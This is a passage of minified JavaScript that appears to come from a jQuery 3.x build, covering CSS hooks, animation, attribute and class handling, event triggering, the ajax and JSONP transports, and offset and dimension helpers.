yu&&(f=yu[t]),""===r||r?(e=parseFloat(f),!0===r||isFinite(e)?e||0:f):f}});i.each(["height","width"],function(n,t){i.cssHooks[t]={get:function(n,r,u){if(r)return!ke.test(i.css(n,"display"))||n.getClientRects().length&&n.getBoundingClientRect().width?du(n,t,u):nu(n,de,function(){return du(n,t,u)})},set:function(n,r,u){var s,f=ui(n),h="border-box"===i.css(n,"boxSizing",!1,f),o=u&&wi(n,t,u,h,f);return h&&e.scrollboxSize()===f.position&&(o-=Math.ceil(n["offset"+t[0].toUpperCase()+t.slice(1)]-parseFloat(f[t])-wi(n,t,"border",!1,f)-.5)),o&&(s=vt.exec(r))&&"px"!==(s[3]||"px")&&(n.style[t]=r,r=i.css(n,t)),ku(n,r,o)}}});i.cssHooks.marginLeft=au(e.reliableMarginLeft,function(n,t){if(t)return(parseFloat(yt(n,"marginLeft"))||n.getBoundingClientRect().left-nu(n,{marginLeft:0},function(){return n.getBoundingClientRect().left}))+"px"});i.each({margin:"",padding:"",border:"Width"},function(n,t){i.cssHooks[n+t]={expand:function(i){for(var r=0,f={},u="string"==typeof i?i.split(" "):[i];r<4;r++)f[n+w[r]+t]=u[r]||u[r-2]||u[0];return f}};"margin"!==n&&(i.cssHooks[n+t].set=ku)});i.fn.extend({css:function(n,t){return p(this,function(n,t,r){var f,e,o={},u=0;if(Array.isArray(t)){for(f=ui(n),e=t.length;u<e;u++)o[t[u]]=i.css(n,t[u],!1,f);return o}return void 0!==r?i.style(n,t,r):i.css(n,t)},n,t,arguments.length>1)}});i.Tween=h;h.prototype={constructor:h,init:function(n,t,r,u,f,e){this.elem=n;this.prop=r;this.easing=f||i.easing._default;this.options=t;this.start=this.now=this.cur();this.end=u;this.unit=e||(i.cssNumber[r]?"":"px")},cur:function(){var n=h.propHooks[this.prop];return n&&n.get?n.get(this):h.propHooks._default.get(this)},run:function(n){var t,r=h.propHooks[this.prop];return this.pos=this.options.duration?t=i.easing[this.easing](n,this.options.duration*n,0,1,this.options.duration):t=n,this.now=(this.end-this.start)*t+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),r&&r.set?r.set(this):h.propHooks._default.set(this),this}};h.prototype.init.prototype=h.prototype;h.propHooks={_default:{get:function(n){var t;return 1!==n.elem.nodeType||null!=n.elem[n.prop]&&null==n.elem.style[n.prop]?n.elem[n.prop]:(t=i.css(n.elem,n.prop,""))&&"auto"!==t?t:0},set:function(n){i.fx.step[n.prop]?i.fx.step[n.prop](n):1!==n.elem.nodeType||null==n.elem.style[i.cssProps[n.prop]]&&!i.cssHooks[n.prop]?n.elem[n.prop]=n.now:i.style(n.elem,n.prop,n.now+n.unit)}}};h.propHooks.scrollTop=h.propHooks.scrollLeft={set:function(n){n.elem.nodeType&&n.elem.parentNode&&(n.elem[n.prop]=n.now)}};i.easing={linear:function(n){return n},swing:function(n){return.5-Math.cos(n*Math.PI)/2},_default:"swing"};i.fx=h.prototype.init;i.fx.step={};gu=/^(?:toggle|show|hide)$/;nf=/queueHooks$/;i.Animation=i.extend(a,{tweeners:{"*":[function(n,t){var i=this.createTween(n,t);return tu(i.elem,n,vt.exec(t),i),i}]},tweener:function(n,t){u(n)?(t=n,n=["*"]):n=n.match(l);for(var i,r=0,f=n.length;r<f;r++)i=n[r],a.tweeners[i]=a.tweeners[i]||[],a.tweeners[i].unshift(t)},prefilters:[no],prefilter:function(n,t){t?a.prefilters.unshift(n):a.prefilters.push(n)}});i.speed=function(n,t,r){var f=n&&"object"==typeof n?i.extend({},n):{complete:r||!r&&t||u(n)&&n,duration:n,easing:r&&t||t&&!u(t)&&t};return i.fx.off?f.duration=0:"number"!=typeof f.duration&&(f.duration=f.duration in i.fx.speeds?i.fx.speeds[f.duration]:i.fx.speeds._default),null!=f.queue&&!0!==f.queue||(f.queue="fx"),f.old=f.complete,f.complete=function(){u(f.old)&&f.old.call(this);f.queue&&i.dequeue(this,f.queue)},f};i.fn.extend({fadeTo:function(n,t,i,r){return this.filter(ti).css("opacity",0).show().end().animate({opacity:t},n,i,r)},animate:function(n,t,u,f){var s=i.isEmptyObject(n),o=i.speed(t,u,f),e=function(){var t=a(this,i.extend({},n),o);(s||r.get(this,"finish"))&&t.stop(!0)};return e.finish=e,s||!1===o.queue?this.each(e):this.queue(o.queue,e)},stop:function(n,t,u){var f=function(n){var t=n.stop;delete n.stop;t(u)};return"string"!=typeof n&&(u=t,t=n,n=void 0),t&&!1!==n&&this.queue(n||"fx",[]),this.each(function(){var s=!0,t=null!=n&&n+"queueHooks",o=i.timers,e=r.get(this);if(t)e[t]&&e[t].stop&&f(e[t]);else for(t in e)e[t]&&e[t].stop&&nf.test(t)&&f(e[t]);for(t=o.length;t--;)o[t].elem!==this||null!=n&&o[t].queue!==n||(o[t].anim.stop(u),s=!1,o.splice(t,1));!s&&u||i.dequeue(this,n)})},finish:function(n){return!1!==n&&(n=n||"fx"),this.each(function(){var t,e=r.get(this),u=e[n+"queue"],o=e[n+"queueHooks"],f=i.timers,s=u?u.length:0;for(e.finish=!0,i.queue(this,n,[]),o&&o.stop&&o.stop.call(this,!0),t=f.length;t--;)f[t].elem===this&&f[t].queue===n&&(f[t].anim.stop(!0),f.splice(t,1));for(t=0;t<s;t++)u[t]&&u[t].finish&&u[t].finish.call(this);delete e.finish})}});i.each(["toggle","show","hide"],function(n,t){var r=i.fn[t];i.fn[t]=function(n,i,u){return null==n||"boolean"==typeof n?r.apply(this,arguments):this.animate(ei(t,!0),n,i,u)}});i.each({slideDown:ei("show"),slideUp:ei("hide"),slideToggle:ei("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(n,t){i.fn[n]=function(n,i,r){return this.animate(t,n,i,r)}});i.timers=[];i.fx.tick=function(){var r,n=0,t=i.timers;for(st=Date.now();n<t.length;n++)(r=t[n])()||t[n]!==r||t.splice(n--,1);t.length||i.fx.stop();st=void 0};i.fx.timer=function(n){i.timers.push(n);i.fx.start()};i.fx.interval=13;i.fx.start=function(){fi||(fi=!0,bi())};i.fx.stop=function(){fi=null};i.fx.speeds={slow:600,fast:200,_default:400};i.fn.delay=function(t,r){return t=i.fx?i.fx.speeds[t]||t:t,r=r||"fx",this.queue(r,function(i,r){var u=n.setTimeout(i,t);r.stop=function(){n.clearTimeout(u)}})},function(){var n=f.createElement("input"),t=f.createElement("select").appendChild(f.createElement("option"));n.type="checkbox";e.checkOn=""!==n.value;e.optSelected=t.selected;(n=f.createElement("input")).value="t";n.type="radio";e.radioValue="t"===n.value}();ht=i.expr.attrHandle;i.fn.extend({attr:function(n,t){return p(this,i.attr,n,t,arguments.length>1)},removeAttr:function(n){return this.each(function(){i.removeAttr(this,n)})}});i.extend({attr:function(n,t,r){var f,u,e=n.nodeType;if(3!==e&&8!==e&&2!==e)return"undefined"==typeof n.getAttribute?i.prop(n,t,r):(1===e&&i.isXMLDoc(n)||(u=i.attrHooks[t.toLowerCase()]||(i.expr.match.bool.test(t)?uf:void 0)),void 0!==r?null===r?void i.removeAttr(n,t):u&&"set"in u&&void 0!==(f=u.set(n,r,t))?f:(n.setAttribute(t,r+""),r):u&&"get"in u&&null!==(f=u.get(n,t))?f:null==(f=i.find.attr(n,t))?void 0:f)},attrHooks:{type:{set:function(n,t){if(!e.radioValue&&"radio"===t&&v(n,"input")){var i=n.value;return n.setAttribute("type",t),i&&(n.value=i),t}}}},removeAttr:function(n,t){var i,u=0,r=t&&t.match(l);if(r&&1===n.nodeType)while(i=r[u++])n.removeAttribute(i)}});uf={set:function(n,t,r){return!1===t?i.removeAttr(n,r):n.setAttribute(r,r),r}};i.each(i.expr.match.bool.source.match(/\w+/g),function(n,t){var r=ht[t]||i.find.attr;ht[t]=function(n,t,i){var f,e,u=t.toLowerCase();return i||(e=ht[u],ht[u]=f,f=null!=r(n,t,i)?u:null,ht[u]=e),f}});ff=/^(?:input|select|textarea|button)$/i;ef=/^(?:a|area)$/i;i.fn.extend({prop:function(n,t){return p(this,i.prop,n,t,arguments.length>1)},removeProp:function(n){return this.each(function(){delete this[i.propFix[n]||n]})}});i.extend({prop:function(n,t,r){var f,u,e=n.nodeType;if(3!==e&&8!==e&&2!==e)return 1===e&&i.isXMLDoc(n)||(t=i.propFix[t]||t,u=i.propHooks[t]),void 0!==r?u&&"set"in u&&void 0!==(f=u.set(n,r,t))?f:n[t]=r:u&&"get"in u&&null!==(f=u.get(n,t))?f:n[t]},propHooks:{tabIndex:{get:function(n){var t=i.find.attr(n,"tabindex");return t?parseInt(t,10):ff.test(n.nodeName)||ef.test(n.nodeName)&&n.href?0:-1}}},propFix:{"for":"htmlFor","class":"className"}});e.optSelected||(i.propHooks.selected={get:function(n){var t=n.parentNode;return t&&t.parentNode&&t.parentNode.selectedIndex,null},set:function(n){var t=n.parentNode;t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex)}});i.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){i.propFix[this.toLowerCase()]=this});i.fn.extend({addClass:function(n){var o,t,r,f,e,s,h,c=0;if(u(n))return this.each(function(t){i(this).addClass(n.call(this,t,nt(this)))});if((o=ki(n)).length)while(t=this[c++])if(f=nt(t),r=1===t.nodeType&&" "+g(f)+" "){for(s=0;e=o[s++];)r.indexOf(" "+e+" ")<0&&(r+=e+" ");f!==(h=g(r))&&t.setAttribute("class",h)}return this},removeClass:function(n){var o,r,t,f,e,s,h,c=0;if(u(n))return this.each(function(t){i(this).removeClass(n.call(this,t,nt(this)))});if(!arguments.length)return this.attr("class","");if((o=ki(n)).length)while(r=this[c++])if(f=nt(r),t=1===r.nodeType&&" "+g(f)+" "){for(s=0;e=o[s++];)while(t.indexOf(" "+e+" ")>-1)t=t.replace(" "+e+" "," ");f!==(h=g(t))&&r.setAttribute("class",h)}return this},toggleClass:function(n,t){var f=typeof n,e="string"===f||Array.isArray(n);return"boolean"==typeof t&&e?t?this.addClass(n):this.removeClass(n):u(n)?this.each(function(r){i(this).toggleClass(n.call(this,r,nt(this),t),t)}):this.each(function(){var t,o,u,s;if(e)for(o=0,u=i(this),s=ki(n);t=s[o++];)u.hasClass(t)?u.removeClass(t):u.addClass(t);else void 0!==n&&"boolean"!==f||((t=nt(this))&&r.set(this,"__className__",t),this.setAttribute&&this.setAttribute("class",t||!1===n?"":r.get(this,"__className__")||""))})},hasClass:function(n){for(var t,r=0,i=" "+n+" ";t=this[r++];)if(1===t.nodeType&&(" "+g(nt(t))+" ").indexOf(i)>-1)return!0;return!1}});of=/\r/g;i.fn.extend({val:function(n){var t,r,e,f=this[0];return arguments.length?(e=u(n),this.each(function(r){var u;1===this.nodeType&&(null==(u=e?n.call(this,r,i(this).val()):n)?u="":"number"==typeof u?u+="":Array.isArray(u)&&(u=i.map(u,function(n){return null==n?"":n+""})),(t=i.valHooks[this.type]||i.valHooks[this.nodeName.toLowerCase()])&&"set"in t&&void 0!==t.set(this,u,"value")||(this.value=u))})):f?(t=i.valHooks[f.type]||i.valHooks[f.nodeName.toLowerCase()])&&"get"in t&&void 0!==(r=t.get(f,"value"))?r:"string"==typeof(r=f.value)?r.replace(of,""):null==r?"":r:void 0}});i.extend({valHooks:{option:{get:function(n){var t=i.find.attr(n,"value");return null!=t?t:g(i.text(n))}},select:{get:function(n){for(var e,t,o=n.options,u=n.selectedIndex,f="select-one"===n.type,s=f?null:[],h=f?u+1:o.length,r=u<0?h:f?u:0;r<h;r++)if(((t=o[r]).selected||r===u)&&!t.disabled&&(!t.parentNode.disabled||!v(t.parentNode,"optgroup"))){if(e=i(t).val(),f)return e;s.push(e)}return s},set:function(n,t){for(var r,u,f=n.options,e=i.makeArray(t),o=f.length;o--;)((u=f[o]).selected=i.inArray(i.valHooks.option.get(u),e)>-1)&&(r=!0);return r||(n.selectedIndex=-1),e}}}});i.each(["radio","checkbox"],function(){i.valHooks[this]={set:function(n,t){if(Array.isArray(t))return n.checked=i.inArray(i(n).val(),t)>-1}};e.checkOn||(i.valHooks[this].get=function(n){return null===n.getAttribute("value")?"on":n.value})});e.focusin="onfocusin"in n;di=/^(?:focusinfocus|focusoutblur)$/;gi=function(n){n.stopPropagation()};i.extend(i.event,{trigger:function(t,e,o,s){var k,c,l,d,v,y,a,p,w=[o||f],h=kt.call(t,"type")?t.type:t,b=kt.call(t,"namespace")?t.namespace.split("."):[];if(c=p=l=o=o||f,3!==o.nodeType&&8!==o.nodeType&&!di.test(h+i.event.triggered)&&(h.indexOf(".")>-1&&(h=(b=h.split(".")).shift(),b.sort()),v=h.indexOf(":")<0&&"on"+h,t=t[i.expando]?t:new i.Event(h,"object"==typeof t&&t),t.isTrigger=s?2:3,t.namespace=b.join("."),t.rnamespace=t.namespace?new RegExp("(^|\\.)"+b.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,t.result=void 0,t.target||(t.target=o),e=null==e?[t]:i.makeArray(e,[t]),a=i.event.special[h]||{},s||!a.trigger||!1!==a.trigger.apply(o,e))){if(!s&&!a.noBubble&&!tt(o)){for(d=a.delegateType||h,di.test(d+h)||(c=c.parentNode);c;c=c.parentNode)w.push(c),l=c;l===(o.ownerDocument||f)&&w.push(l.defaultView||l.parentWindow||n)}for(k=0;(c=w[k++])&&!t.isPropagationStopped();)p=c,t.type=k>1?d:a.bindType||h,(y=(r.get(c,"events")||{})[t.type]&&r.get(c,"handle"))&&y.apply(c,e),(y=v&&c[v])&&y.apply&&lt(c)&&(t.result=y.apply(c,e),!1===t.result&&t.preventDefault());return t.type=h,s||t.isDefaultPrevented()||a._default&&!1!==a._default.apply(w.pop(),e)||!lt(o)||v&&u(o[h])&&!tt(o)&&((l=o[v])&&(o[v]=null),i.event.triggered=h,t.isPropagationStopped()&&p.addEventListener(h,gi),o[h](),t.isPropagationStopped()&&p.removeEventListener(h,gi),i.event.triggered=void 0,l&&(o[v]=l)),t.result}},simulate:function(n,t,r){var u=i.extend(new i.Event,r,{type:n,isSimulated:!0});i.event.trigger(u,null,t)}});i.fn.extend({trigger:function(n,t){return this.each(function(){i.event.trigger(n,t,this)})},triggerHandler:function(n,t){var r=this[0];if(r)return i.event.trigger(n,t,r,!0)}});e.focusin||i.each({focus:"focusin",blur:"focusout"},function(n,t){var u=function(n){i.event.simulate(t,n.target,i.event.fix(n))};i.event.special[t]={setup:function(){var i=this.ownerDocument||this,f=r.access(i,t);f||i.addEventListener(n,u,!0);r.access(i,t,(f||0)+1)},teardown:function(){var i=this.ownerDocument||this,f=r.access(i,t)-1;f?r.access(i,t,f):(i.removeEventListener(n,u,!0),r.remove(i,t))}}});var pt=n.location,sf=Date.now(),nr=/\?/;i.parseXML=function(t){var r;if(!t||"string"!=typeof t)return null;try{r=(new n.DOMParser).parseFromString(t,"text/xml")}catch(n){r=void 0}return r&&!r.getElementsByTagName("parsererror").length||i.error("Invalid XML: "+t),r};var io=/\[\]$/,hf=/\r?\n/g,ro=/^(?:submit|button|image|reset|file)$/i,uo=/^(?:input|select|textarea|keygen)/i;i.param=function(n,t){var r,f=[],e=function(n,t){var i=u(t)?t():t;f[f.length]=encodeURIComponent(n)+"="+encodeURIComponent(null==i?"":i)};if(Array.isArray(n)||n.jquery&&!i.isPlainObject(n))i.each(n,function(){e(this.name,this.value)});else for(r in n)tr(r,n[r],t,e);return f.join("&")};i.fn.extend({serialize:function(){return i.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var n=i.prop(this,"elements");return n?i.makeArray(n):this}).filter(function(){var n=this.type;return this.name&&!i(this).is(":disabled")&&uo.test(this.nodeName)&&!ro.test(n)&&(this.checked||!iu.test(n))}).map(function(n,t){var r=i(this).val();return null==r?null:Array.isArray(r)?i.map(r,function(n){return{name:t.name,value:n.replace(hf,"\r\n")}}):{name:t.name,value:r.replace(hf,"\r\n")}}).get()}});var fo=/%20/g,eo=/#.*$/,oo=/([?&])_=[^&]*/,so=/^(.*?):[ \t]*([^\r\n]*)$/gm,ho=/^(?:GET|HEAD)$/,co=/^\/\//,cf={},ir={},lf="*/".concat("*"),rr=f.createElement("a");return rr.href=pt.href,i.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:pt.href,type:"GET",isLocal:/^(?:about|app|app-storage|.+-extension|file|res|widget):$/.test(pt.protocol),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":lf,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/\bxml\b/,html:/\bhtml/,json:/\bjson\b/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":JSON.parse,"text xml":i.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(n,t){return t?ur(ur(n,i.ajaxSettings),t):ur(i.ajaxSettings,n)},ajaxPrefilter:af(cf),ajaxTransport:af(ir),ajax:function(t,r){function b(t,r,f,c){var v,rt,b,p,g,l=r;s||(s=!0,d&&n.clearTimeout(d),a=void 0,k=c||"",e.readyState=t>0?4:0,v=t>=200&&t<300||304===t,f&&(p=lo(u,e,f)),p=ao(u,p,e,v),v?(u.ifModified&&((g=e.getResponseHeader("Last-Modified"))&&(i.lastModified[o]=g),(g=e.getResponseHeader("etag"))&&(i.etag[o]=g)),204===t||"HEAD"===u.type?l="nocontent":304===t?l="notmodified":(l=p.state,rt=p.data,v=!(b=p.error))):(b=l,!t&&l||(l="error",t<0&&(t=0))),e.status=t,e.statusText=(r||l)+"",v?tt.resolveWith(h,[rt,l,e]):tt.rejectWith(h,[e,l,b]),e.statusCode(w),w=void 0,y&&nt.trigger(v?"ajaxSuccess":"ajaxError",[e,u,v?rt:b]),it.fireWith(h,[e,l]),y&&(nt.trigger("ajaxComplete",[e,u]),--i.active||i.event.trigger("ajaxStop")))}"object"==typeof t&&(r=t,t=void 0);r=r||{};var a,o,k,v,d,c,s,y,g,p,u=i.ajaxSetup({},r),h=u.context||u,nt=u.context&&(h.nodeType||h.jquery)?i(h):i.event,tt=i.Deferred(),it=i.Callbacks("once memory"),w=u.statusCode||{},rt={},ut={},ft="canceled",e={readyState:0,getResponseHeader:function(n){var t;if(s){if(!v)for(v={};t=so.exec(k);)v[t[1].toLowerCase()]=t[2];t=v[n.toLowerCase()]}return null==t?null:t},getAllResponseHeaders:function(){return s?k:null},setRequestHeader:function(n,t){return null==s&&(n=ut[n.toLowerCase()]=ut[n.toLowerCase()]||n,rt[n]=t),this},overrideMimeType:function(n){return null==s&&(u.mimeType=n),this},statusCode:function(n){var t;if(n)if(s)e.always(n[e.status]);else for(t in n)w[t]=[w[t],n[t]];return this},abort:function(n){var t=n||ft;return a&&a.abort(t),b(0,t),this}};if(tt.promise(e),u.url=((t||u.url||pt.href)+"").replace(co,pt.protocol+"//"),u.type=r.method||r.type||u.method||u.type,u.dataTypes=(u.dataType||"*").toLowerCase().match(l)||[""],null==u.crossDomain){c=f.createElement("a");try{c.href=u.url;c.href=c.href;u.crossDomain=rr.protocol+"//"+rr.host!=c.protocol+"//"+c.host}catch(n){u.crossDomain=!0}}if(u.data&&u.processData&&"string"!=typeof u.data&&(u.data=i.param(u.data,u.traditional)),vf(cf,u,r,e),s)return e;(y=i.event&&u.global)&&0==i.active++&&i.event.trigger("ajaxStart");u.type=u.type.toUpperCase();u.hasContent=!ho.test(u.type);o=u.url.replace(eo,"");u.hasContent?u.data&&u.processData&&0===(u.contentType||"").indexOf("application/x-www-form-urlencoded")&&(u.data=u.data.replace(fo,"+")):(p=u.url.slice(o.length),u.data&&(u.processData||"string"==typeof u.data)&&(o+=(nr.test(o)?"&":"?")+u.data,delete u.data),!1===u.cache&&(o=o.replace(oo,"$1"),p=(nr.test(o)?"&":"?")+"_="+sf+++p),u.url=o+p);u.ifModified&&(i.lastModified[o]&&e.setRequestHeader("If-Modified-Since",i.lastModified[o]),i.etag[o]&&e.setRequestHeader("If-None-Match",i.etag[o]));(u.data&&u.hasContent&&!1!==u.contentType||r.contentType)&&e.setRequestHeader("Content-Type",u.contentType);e.setRequestHeader("Accept",u.dataTypes[0]&&u.accepts[u.dataTypes[0]]?u.accepts[u.dataTypes[0]]+("*"!==u.dataTypes[0]?", "+lf+"; q=0.01":""):u.accepts["*"]);for(g in u.headers)e.setRequestHeader(g,u.headers[g]);if(u.beforeSend&&(!1===u.beforeSend.call(h,e,u)||s))return e.abort();if(ft="abort",it.add(u.complete),e.done(u.success),e.fail(u.error),a=vf(ir,u,r,e)){if(e.readyState=1,y&&nt.trigger("ajaxSend",[e,u]),s)return e;u.async&&u.timeout>0&&(d=n.setTimeout(function(){e.abort("timeout")},u.timeout));try{s=!1;a.send(rt,b)}catch(n){if(s)throw n;b(-1,n)}}else b(-1,"No Transport");return e},getJSON:function(n,t,r){return i.get(n,t,r,"json")},getScript:function(n,t){return i.get(n,void 0,t,"script")}}),i.each(["get","post"],function(n,t){i[t]=function(n,r,f,e){return u(r)&&(e=e||f,f=r,r=void 0),i.ajax(i.extend({url:n,type:t,dataType:e,data:r,success:f},i.isPlainObject(n)&&n))}}),i._evalUrl=function(n){return i.ajax({url:n,type:"GET",dataType:"script",cache:!0,async:!1,global:!1,throws:!0})},i.fn.extend({wrapAll:function(n){var t;return this[0]&&(u(n)&&(n=n.call(this[0])),t=i(n,this[0].ownerDocument).eq(0).clone(!0),this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){for(var n=this;n.firstElementChild;)n=n.firstElementChild;return n}).append(this)),this},wrapInner:function(n){return u(n)?this.each(function(t){i(this).wrapInner(n.call(this,t))}):this.each(function(){var t=i(this),r=t.contents();r.length?r.wrapAll(n):t.append(n)})},wrap:function(n){var t=u(n);return this.each(function(r){i(this).wrapAll(t?n.call(this,r):n)})},unwrap:function(n){return this.parent(n).not("body").each(function(){i(this).replaceWith(this.childNodes)}),this}}),i.expr.pseudos.hidden=function(n){return!i.expr.pseudos.visible(n)},i.expr.pseudos.visible=function(n){return!!(n.offsetWidth||n.offsetHeight||n.getClientRects().length)},i.ajaxSettings.xhr=function(){try{return new n.XMLHttpRequest}catch(n){}},yf={0:200,1223:204},ct=i.ajaxSettings.xhr(),e.cors=!!ct&&"withCredentials"in ct,e.ajax=ct=!!ct,i.ajaxTransport(function(t){var i,r;if(e.cors||ct&&!t.crossDomain)return{send:function(u,f){var o,e=t.xhr();if(e.open(t.type,t.url,t.async,t.username,t.password),t.xhrFields)for(o in t.xhrFields)e[o]=t.xhrFields[o];t.mimeType&&e.overrideMimeType&&e.overrideMimeType(t.mimeType);t.crossDomain||u["X-Requested-With"]||(u["X-Requested-With"]="XMLHttpRequest");for(o in u)e.setRequestHeader(o,u[o]);i=function(n){return function(){i&&(i=r=e.onload=e.onerror=e.onabort=e.ontimeout=e.onreadystatechange=null,"abort"===n?e.abort():"error"===n?"number"!=typeof e.status?f(0,"error"):f(e.status,e.statusText):f(yf[e.status]||e.status,e.statusText,"text"!==(e.responseType||"text")||"string"!=typeof e.responseText?{binary:e.response}:{text:e.responseText},e.getAllResponseHeaders()))}};e.onload=i();r=e.onerror=e.ontimeout=i("error");void 0!==e.onabort?e.onabort=r:e.onreadystatechange=function(){4===e.readyState&&n.setTimeout(function(){i&&r()})};i=i("abort");try{e.send(t.hasContent&&t.data||null)}catch(n){if(i)throw n;}},abort:function(){i&&i()}}}),i.ajaxPrefilter(function(n){n.crossDomain&&(n.contents.script=!1)}),i.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/\b(?:java|ecma)script\b/},converters:{"text script":function(n){return i.globalEval(n),n}}}),i.ajaxPrefilter("script",function(n){void 0===n.cache&&(n.cache=!1);n.crossDomain&&(n.type="GET")}),i.ajaxTransport("script",function(n){if(n.crossDomain){var r,t;return{send:function(u,e){r=i("<script>").prop({charset:n.scriptCharset,src:n.url}).on("load error",t=function(n){r.remove();t=null;n&&e("error"===n.type?404:200,n.type)});f.head.appendChild(r[0])},abort:function(){t&&t()}}}}),fr=[],oi=/(=)\?(?=&|$)|\?\?/,i.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var n=fr.pop()||i.expando+"_"+sf++;return this[n]=!0,n}}),i.ajaxPrefilter("json jsonp",function(t,r,f){var e,o,s,h=!1!==t.jsonp&&(oi.test(t.url)?"url":"string"==typeof t.data&&0===(t.contentType||"").indexOf("application/x-www-form-urlencoded")&&oi.test(t.data)&&"data");if(h||"jsonp"===t.dataTypes[0])return e=t.jsonpCallback=u(t.jsonpCallback)?t.jsonpCallback():t.jsonpCallback,h?t[h]=t[h].replace(oi,"$1"+e):!1!==t.jsonp&&(t.url+=(nr.test(t.url)?"&":"?")+t.jsonp+"="+e),t.converters["script json"]=function(){return s||i.error(e+" was not called"),s[0]},t.dataTypes[0]="json",o=n[e],n[e]=function(){s=arguments},f.always(function(){void 0===o?i(n).removeProp(e):n[e]=o;t[e]&&(t.jsonpCallback=r.jsonpCallback,fr.push(e));s&&u(o)&&o(s[0]);s=o=void 0}),"script"}),e.createHTMLDocument=function(){var n=f.implementation.createHTMLDocument("").body;return n.innerHTML="<form><\/form><form><\/form>",2===n.childNodes.length}(),i.parseHTML=function(n,t,r){if("string"!=typeof n)return[];"boolean"==typeof t&&(r=t,t=!1);var s,u,o;return t||(e.createHTMLDocument?((s=(t=f.implementation.createHTMLDocument("")).createElement("base")).href=f.location.href,t.head.appendChild(s)):t=f),u=ci.exec(n),o=!r&&[],u?[t.createElement(u[1])]:(u=eu([n],t,o),o&&o.length&&i(o).remove(),i.merge([],u.childNodes))},i.fn.load=function(n,t,r){var f,s,h,e=this,o=n.indexOf(" ");return o>-1&&(f=g(n.slice(o)),n=n.slice(0,o)),u(t)?(r=t,t=void 0):t&&"object"==typeof t&&(s="POST"),e.length>0&&i.ajax({url:n,type:s||"GET",dataType:"html",data:t}).done(function(n){h=arguments;e.html(f?i("<div>").append(i.parseHTML(n)).find(f):n)}).always(r&&function(n,t){e.each(function(){r.apply(this,h||[n.responseText,t,n])})}),this},i.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(n,t){i.fn[t]=function(n){return this.on(t,n)}}),i.expr.pseudos.animated=function(n){return i.grep(i.timers,function(t){return n===t.elem}).length},i.offset={setOffset:function(n,t,r){var v,o,s,h,f,c,y,l=i.css(n,"position"),a=i(n),e={};"static"===l&&(n.style.position="relative");f=a.offset();s=i.css(n,"top");c=i.css(n,"left");(y=("absolute"===l||"fixed"===l)&&(s+c).indexOf("auto")>-1)?(h=(v=a.position()).top,o=v.left):(h=parseFloat(s)||0,o=parseFloat(c)||0);u(t)&&(t=t.call(n,r,i.extend({},f)));null!=t.top&&(e.top=t.top-f.top+h);null!=t.left&&(e.left=t.left-f.left+o);"using"in t?t.using.call(n,e):a.css(e)}},i.fn.extend({offset:function(n){if(arguments.length)return void 0===n?this:this.each(function(t){i.offset.setOffset(this,n,t)});var r,u,t=this[0];if(t)return t.getClientRects().length?(r=t.getBoundingClientRect(),u=t.ownerDocument.defaultView,{top:r.top+u.pageYOffset,left:r.left+u.pageXOffset}):{top:0,left:0}},position:function(){if(this[0]){var n,r,u,t=this[0],f={top:0,left:0};if("fixed"===i.css(t,"position"))r=t.getBoundingClientRect();else{for(r=this.offset(),u=t.ownerDocument,n=t.offsetParent||u.documentElement;n&&(n===u.body||n===u.documentElement)&&"static"===i.css(n,"position");)n=n.parentNode;n&&n!==t&&1===n.nodeType&&((f=i(n).offset()).top+=i.css(n,"borderTopWidth",!0),f.left+=i.css(n,"borderLeftWidth",!0))}return{top:r.top-f.top-i.css(t,"marginTop",!0),left:r.left-f.left-i.css(t,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){for(var n=this.offsetParent;n&&"static"===i.css(n,"position");)n=n.offsetParent;return n||ii})}}),i.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(n,t){var r="pageYOffset"===t;i.fn[n]=function(i){return p(this,function(n,i,u){var f;if(tt(n)?f=n:9===n.nodeType&&(f=n.defaultView),void 0===u)return f?f[t]:n[i];f?f.scrollTo(r?f.pageXOffset:u,r?u:f.pageYOffset):n[i]=u},n,i,arguments.length)}}),i.each(["top","left"],function(n,t){i.cssHooks[t]=au(e.pixelPosition,function(n,r){if(r)return r=yt(n,t),pi.test(r)?i(n).position()[t]+"px":r})}),i.each({Height:"height",Width:"width"},function(n,t){i.each({padding:"inner"+n,content:t,"":"outer"+n},function(r,u){i.fn[u]=function(f,e){var o=arguments.length&&(r||"boolean"!=typeof f),s=r||(!0===f||!0===e?"margin":"border");return p(this,function(t,r,f){var e;return tt(t)?0===u.indexOf("outer")?t["inner"+n]:t.document.documentElement["client"+n]:9===t.nodeType?(e=t.documentElement,Math.max(t.body["scroll"+n],e["scroll"+n],t.body["offset"+n],e["offset"+n],e["client"+n])):void 0===f?i.css(t,r,s):i.style(t,r,f,s)},t,o?f:void 0,o)}})}),i.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "),function(n,t){i.fn[t]=function(n,i){return arguments.length>0?this.on(t,null,n,i):this.trigger(t)}}),i.fn.extend({hover:function(n,t){return this.mouseenter(n).mouseleave(t||n)}}),i.fn.extend({bind:function(n,t,i){return this.on(n,null,t,i)},unbind:function(n,t){return this.off(n,null,t)},delegate:function(n,t,i,r){return this.on(t,n,i,r)},undelegate:function(n,t,i){return 1===arguments.length?this.off(n,"**"):this.off(t,n||"**",i)}}),i.proxy=function(n,t){var f,e,r;if("string"==typeof t&&(f=n[t],t=n,n=f),u(n))return e=d.call(arguments,2),r=function(){return 